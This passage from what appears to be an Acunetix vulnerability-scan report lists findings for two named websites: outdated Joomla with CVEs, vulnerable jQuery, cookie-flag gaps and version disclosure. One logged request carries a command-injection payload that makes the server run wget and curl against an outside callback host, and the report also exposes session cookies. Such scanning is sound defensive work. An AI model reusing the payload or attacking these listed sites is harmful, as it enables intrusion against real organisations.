Current Joomla! version: 3.6.5.
171
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Security Bypass (2.5.0 - 3.9.18)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions ranging from 2.5.0 and up to and
including 3.9.18 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/814-20200602-core-inconsistent-default-textfilter-settings
(https://developer.joomla.org/security-centre/814-20200602-core-inconsistent-default-textfilter-settings)
CVE-2020-13763 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13763)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
172
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Security Bypass (2.5.0 - 3.9.19)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions ranging from 2.5.0 and up to and
including 3.9.19 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/819-20200702-core-missing-checks-can-lead-to-a-broken-usergroups-table-
record.html (https://developer.joomla.org/security-centre/819-20200702-core-missing-checks-can-lead-to-a-broken-
usergroups-table-record.html)
CVE-2020-15699 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15699)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
173
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Security Bypass (2.5.0 - 3.9.27)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions ranging from 2.5.0 and up to and
including 3.9.27 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/859-20210704-core-privilege-escalation-through-com-installer.html
(https://developer.joomla.org/security-centre/859-20210704-core-privilege-escalation-through-com-installer.html)
CVE-2021-26038 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26038)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
174
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Security Bypass (2.5.0 - 3.9.27)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions ranging from 2.5.0 and up to and
including 3.9.27 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/858-20210703-core-lack-of-enforced-session-termination.html
(https://developer.joomla.org/security-centre/858-20210703-core-lack-of-enforced-session-termination.html)
CVE-2021-26037 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26037)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
175
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core SQL Injection (1.7.0 - 3.9.15)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before
using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data,
or exploit latent vulnerabilities in the underlying database. Joomla! Core versions ranging from 1.7.0 and up to and
including 3.9.15 are vulnerable.
Impact
Recommendation
References
https://pentest.co.uk/labs/advisory/cve-2020-10243/ (https://pentest.co.uk/labs/advisory/cve-2020-10243/)
https://github.com/HoangKien1020/Joomla-SQLinjection (https://github.com/HoangKien1020/Joomla-SQLinjection)
https://developer.joomla.org/security-centre/807-20200306-core-sql-injection-in-featured-articles-menu-parameters.html
(https://developer.joomla.org/security-centre/807-20200306-core-sql-injection-in-featured-articles-menu-parameters.html)
CVE-2020-10243 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10243)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
176
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Application error messages
Severity Medium
Reported by module /Scripts/PerScheme/Error_Message.script
Description
Acunetix found one or more error/warning messages. Application error or warning messages may expose sensitive
information about an application's internal workings to an attacker.
These messages may also contain the location of the file that produced an unhandled exception.
Consult the 'Attack details' section for more information about the affected page(s).
Impact
Error messages may disclose sensitive information which can be used to escalate attacks.
Recommendation
Verify that these page(s) are disclosing error or warning messages and properly configure the application to log errors to a
file instead of displaying the error to the user.
References
Affected items
Web Server
Details
Application error messages:
https://www.sogbci.com/administrator/index.php
177
Request headers
POST /administrator/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: https://www.sogbci.com/
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Content-Length: 274
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
71636bd32b93c53359e2fa6ccd6fa7b6=1&lang=en-GB&option=com_login&passwd=u]H[ww6KrA9F.x-
F&return=aW5kZXgucGhw&task=login&username[#this.getClass().forName('java.lang.Runtime').g
etRuntime().exec('wget+http://hitqhzwjzntur.bxss.me/||curl+http://hitqhzwjzntur.bxss.me/'
)]=pHqghUme
TLS/SSL certificate about to expire
Severity Low
Reported by module /Scripts/PerServer/SSL_Audit.script
Description
Once the certificate has expired, most web browsers will present end-users with a security warning, asking them to
manually confirm the authenticity of your certificate chain. Software or automated systems may silently refuse to connect to
the server.
This alert is not necessarily caused by the server (leaf) certificate, but may have been triggered by an intermediate
certificate. Please refer to the certificate serial number in the alert details to identify the affected certificate.
Impact
If an application server detects an expired certificate with a system it is communicating with, the application server may
continue processing data as if nothing happened, or the connection may be abruptly terminated.
Recommendation
Affected items
178
Web Server
Details
The TLS/SSL certificate (serial: 048200f90e036a9de9bc5b47e3b958fd4d67) will expire in less than 60 days. The
certificate validity period is from Sun Jun 11 2023 16:30:00 GMT+0000 (Greenwich Standard Time) to Sat Sep 09
2023 16:29:59 GMT+0000 (Greenwich Standard Time) (47 days left)
Request headers
PHP Version Disclosure
Severity Informational
Reported by module /Scripts/PerServer/Version_Check.script
Description
The web server is sending the X-Powered-By: response headers, revealing the PHP version.
Impact
An attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified.
Recommendation
Configure your web server to prevent information leakage from its HTTP response.
References
Affected items
Web Server
Details
Version detected: PHP/5.6.40.
Request headers
179
Scanned items (coverage report)
https://www.sogbci.com/
https://www.sogbci.com/contacts
180
Vulnerabilities
Scan details
Scan information
Start url https://nsiaassurances.ci
Host https://nsiaassurances.ci/
Threat level
One or more medium-severity type vulnerabilities have been discovered by the scanner. You should investigate each of
these vulnerabilities to ensure they will not escalate to more severe problems.
Alerts distribution
181
Alerts summary
Vulnerable JavaScript libraries
Classification
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: None
CWE CWE-937
Affected items Variation
Web Server 2
Cookies with missing, inconsistent or contradictory properties
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:N
CVSS3
User Interaction: Required
Scope: Unchanged
182
Base Score: 0.0
Authentication: None
CWE CWE-284
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:N
CVSS3
User Interaction: Required
Scope: Unchanged
Authentication: None
CWE CWE-1004
Affected items Variation
Web Server 1
Classification
183
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N
CVSS3
User Interaction: Required
Scope: Unchanged
Authentication: None
CWE CWE-614
Affected items Variation
Web Server 1
Documentation files
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: None
184
CWE CWE-538
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L
CVSS3
User Interaction: Required
Scope: Changed
Authentication: Single
CWE CWE-829
Affected items Variation
/index.php/pt/node/13 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N
CVSS3
User Interaction: Required
Scope: Changed
185
Base Score: 0.0
Authentication: None
CWE CWE-1021
Affected items Variation
Web Server 1
Email addresses
Classification
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: None
CWE CWE-200
Affected items Variation
Web Server 1
File uploads
Classification
186
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: None
CWE CWE-16
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: None
187
CWE CWE-16
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: None
CWE CWE-200
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:N
CVSS3
User Interaction: None
Scope: Changed
188
Base Score: 0.0
Authentication: None
CWE CWE-16
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:N/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: None
CWE CWE-937
Affected items Variation
Web Server 2
Classification
189
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: None
CWE CWE-1021
Affected items Variation
Web Server 1
Classification
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: None
190
CWE CWE-16
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:N
CVSS3
User Interaction: None
Scope: Changed
Authentication: None
CWE CWE-830
Affected items Variation
Web Server 1
/index.php/en/node/28 1
/node/22 1
/pt/node/22 1
191
Alerts details
Vulnerable JavaScript libraries
Severity Medium
Reported by module /httpdata/javascript_library_audit_external.js
Description
You are using one or more vulnerable JavaScript libraries. One or more vulnerabilities were reported for this version of the
library. Consult Attack details and Web References for more information about the affected library and the vulnerabilities
that were reported.
Impact
Recommendation
Affected items
Web Server
Details
jQuery 3.0.0
URL: https://cdnjs.cloudflare.com/ajax/libs/jquery/3.0.0/jquery.min.js
Detection method: The library's name and version were determined based on the file's CDN URI.
CVE-ID: CVE-2020-11022, CVE-2020-11023, CVE-2019-11358
Description: In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted
sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and
others) may execute untrusted code. This problem is patched in jQuery 3.5.0. / In jQuery versions greater than
or equal to 1.0.3 and before 3.5.0, passing HTML containing option elements from untrusted sources - even
after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may
execute untrusted code. This problem is patched in jQuery 3.5.0. / jQuery mishandles jQuery.extend(true, {},
...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__
property, it could extend the native Object.prototype.
References:
https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
https://mksben.l0.cm/2020/05/jquery3.5.0-xss.html
https://jquery.com/upgrade-guide/3.5/
https://api.jquery.com/jQuery.htmlPrefilter/
https://www.cvedetails.com/cve/CVE-2020-11022/
https://github.com/advisories/GHSA-gxr4-xjj5-5px2
https://www.cvedetails.com/cve/CVE-2020-11023/
https://github.com/advisories/GHSA-jpcq-cgw6-v4j6
https://github.com/jquery/jquery/pull/4333
https://nvd.nist.gov/vuln/detail/CVE-2019-11358
https://nvd.nist.gov/vuln/detail/CVE-2019-5428
https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/
Request headers
192
GET /en/node/28?name=zFPWdwPk&optionDriver=1&subject=Souscription HTTP/1.1
Referer: https://nsiaassurances.ci/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: nsiaassurances.ci
Connection: Keep-alive
Web Server
Details
jQuery 3.2.1
URL: https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js
Detection method: The library's name and version were determined based on the file's CDN URI.
CVE-ID: CVE-2020-11022, CVE-2020-11023, CVE-2019-11358
Description: In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted
sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and
others) may execute untrusted code. This problem is patched in jQuery 3.5.0. / In jQuery versions greater than
or equal to 1.0.3 and before 3.5.0, passing HTML containing option elements from untrusted sources - even
after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may
execute untrusted code. This problem is patched in jQuery 3.5.0. / jQuery mishandles jQuery.extend(true, {},
...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__
property, it could extend the native Object.prototype.
References:
https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
https://mksben.l0.cm/2020/05/jquery3.5.0-xss.html
https://jquery.com/upgrade-guide/3.5/
https://api.jquery.com/jQuery.htmlPrefilter/
https://www.cvedetails.com/cve/CVE-2020-11022/
https://github.com/advisories/GHSA-gxr4-xjj5-5px2
https://www.cvedetails.com/cve/CVE-2020-11023/
https://github.com/advisories/GHSA-jpcq-cgw6-v4j6
https://github.com/jquery/jquery/pull/4333
https://nvd.nist.gov/vuln/detail/CVE-2019-11358
https://nvd.nist.gov/vuln/detail/CVE-2019-5428
https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/
Request headers
193
GET /pt/node/22 HTTP/1.1
Referer: https://nsiaassurances.ci/
Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD4RubqPc;
cookiesjsr=%7B%22base%22%3Afalse%2C%22analytics%22%3Afalse%2C%22facebook_pixel%22%3Afalse
%2C%22video%22%3Afalse%7D; big_pipe_nojs=1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: nsiaassurances.ci
Connection: Keep-alive
Cookies with missing, inconsistent or contradictory properties
Severity Low
Reported by module /RPA/Cookie_Validator.js
Description
At least one of the following cookies properties causes the cookie to be invalid or incompatible with either a different
property of the same cookie, of with the environment the cookie is being used in. Although this is not a vulnerability in itself,
it will likely lead to unexpected behavior by the application, which in turn may cause secondary security issues.
Impact
Recommendation
Ensure that the cookies configuration complies with the applicable standards.
References
Affected items
Web Server
Verified vulnerability
Details
List of cookies with missing, inconsistent or contradictory properties:
194
https://nsiaassurances.ci/index.php/en/node/28
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD
When cookies lack the SameSite attribute, Web browsers may apply different and sometim
https://nsiaassurances.ci/en/node/28
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=Xj88ZLgeBOYP_oTu9DnDoaYkvbBjRMmUdl4Rb
When cookies lack the SameSite attribute, Web browsers may apply different and sometim
https://nsiaassurances.ci/index.php/pt/node/13
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD
When cookies lack the SameSite attribute, Web browsers may apply different and sometim
https://nsiaassurances.ci/en/node/19
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=Xj88ZLgeBOYP_oTu9DnDoaYkvbBjRMmUdl4Rb
When cookies lack the SameSite attribute, Web browsers may apply different and sometim
https://nsiaassurances.ci/fr/node/28
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg
When cookies lack the SameSite attribute, Web browsers may apply different and sometim
195
https://nsiaassurances.ci/index.php/en/node/28
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg
When cookies lack the SameSite attribute, Web browsers may apply different and sometim
https://nsiaassurances.ci/cookies/documentation
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg
When cookies lack the SameSite attribute, Web browsers may apply different and sometim
https://nsiaassurances.ci/index.php/pt/node/28
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg
When cookies lack the SameSite attribute, Web browsers may apply different and sometim
https://nsiaassurances.ci/index.php/en/node/30
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg
When cookies lack the SameSite attribute, Web browsers may apply different and sometim
https://nsiaassurances.ci/fr/user/login
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg
When cookies lack the SameSite attribute, Web browsers may apply different and sometim
196
https://nsiaassurances.ci/pt/user/register
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg
When cookies lack the SameSite attribute, Web browsers may apply different and sometim
https://nsiaassurances.ci/index.php/pt/node/28
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg
When cookies lack the SameSite attribute, Web browsers may apply different and sometim
https://nsiaassurances.ci/fr/node/13
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg
When cookies lack the SameSite attribute, Web browsers may apply different and sometim
https://nsiaassurances.ci/index.php/user/register/
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD
When cookies lack the SameSite attribute, Web browsers may apply different and sometim
https://nsiaassurances.ci/index.php/pt/node/18
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD
When cookies lack the SameSite attribute, Web browsers may apply different and sometim
197
https://nsiaassurances.ci/themes/custom/nsiasubtheme/css/img/slider/
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD
When cookies lack the SameSite attribute, Web browsers may apply different and sometim
https://nsiaassurances.ci/index.php/fr/node/28
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD
When cookies lack the SameSite attribute, Web browsers may apply different and sometim
https://nsiaassurances.ci/index.php/en/system/404
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD
When cookies lack the SameSite attribute, Web browsers may apply different and sometim
https://nsiaassurances.ci/fr/node/30
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD
When cookies lack the SameSite attribute, Web browsers may apply different and sometim
https://nsiaassurances.ci/index.php/fr/node/28
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD
When cookies lack the SameSite attribute, Web browsers may apply different and sometim
198
https://nsiaassurances.ci/pt/node/20
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD
When cookies lack the SameSite attribute, Web browsers may apply different and sometim
Request headers
GET /index.php/en/node/28?name=zFPWdwPk&optionDriver=1&subject=Souscription HTTP/1.1
Referer: https://nsiaassurances.ci/
Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD4RubqPc
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: nsiaassurances.ci
Connection: Keep-alive
Cookies without HttpOnly flag set
Severity Low
Reported by module /RPA/Cookie_Without_HttpOnly.js
Description
One or more cookies don't have the HttpOnly flag set. When a cookie is set with the HttpOnly flag, it instructs the browser
that the cookie can only be accessed by the server and not by client-side scripts. This is an important security protection for
session cookies.
Impact
Recommendation
If possible, you should set the HttpOnly flag for these cookies.
Affected items
Web Server
Verified vulnerability
199
Details
Cookies without HttpOnly flag set:
https://nsiaassurances.ci/fr/big_pipe/no-js
Request headers
GET /fr/big_pipe/no-js?destination=/fr/cookies/documentation HTTP/1.1
Referer: https://nsiaassurances.ci/cookies/documentation
Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD4RubqPc;
cookiesjsr=%7B%22base%22%3Afalse%2C%22analytics%22%3Afalse%2C%22facebook_pixel%22%3Afalse
%2C%22video%22%3Afalse%7D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: nsiaassurances.ci
Connection: Keep-alive
Cookies without Secure flag set
Severity Low
Reported by module /RPA/Cookie_Without_Secure.js
Description
One or more cookies does not have the Secure flag set. When a cookie is set with the Secure flag, it instructs the browser
that the cookie can only be accessed over secure SSL/TLS channels. This is an important security protection for session
cookies.
Impact
Recommendation
If possible, you should set the Secure flag for these cookies.
Affected items
Web Server
Verified vulnerability
200
Details
Cookies without Secure flag set:
https://nsiaassurances.ci/index.php/en/node/28
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD
https://nsiaassurances.ci/en/node/28
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=Xj88ZLgeBOYP_oTu9DnDoaYkvbBjRMmUdl4Rb
https://nsiaassurances.ci/index.php/pt/node/13
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD
https://nsiaassurances.ci/en/node/19
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=Xj88ZLgeBOYP_oTu9DnDoaYkvbBjRMmUdl4Rb
https://nsiaassurances.ci/fr/node/28
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg
https://nsiaassurances.ci/index.php/en/node/28
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg
https://nsiaassurances.ci/cookies/documentation
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg
https://nsiaassurances.ci/index.php/pt/node/28
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg
https://nsiaassurances.ci/index.php/en/node/30
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg
https://nsiaassurances.ci/fr/user/login
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg
201
https://nsiaassurances.ci/pt/user/register
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg
https://nsiaassurances.ci/index.php/pt/node/28
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg
https://nsiaassurances.ci/fr/node/13
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg
https://nsiaassurances.ci/index.php/user/register/
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD
https://nsiaassurances.ci/index.php/pt/node/18
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD
https://nsiaassurances.ci/themes/custom/nsiasubtheme/css/img/slider/
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD
https://nsiaassurances.ci/index.php/fr/node/28
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD
https://nsiaassurances.ci/index.php/en/system/404
Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD
https://nsiaassurances.ci/fr/node/30
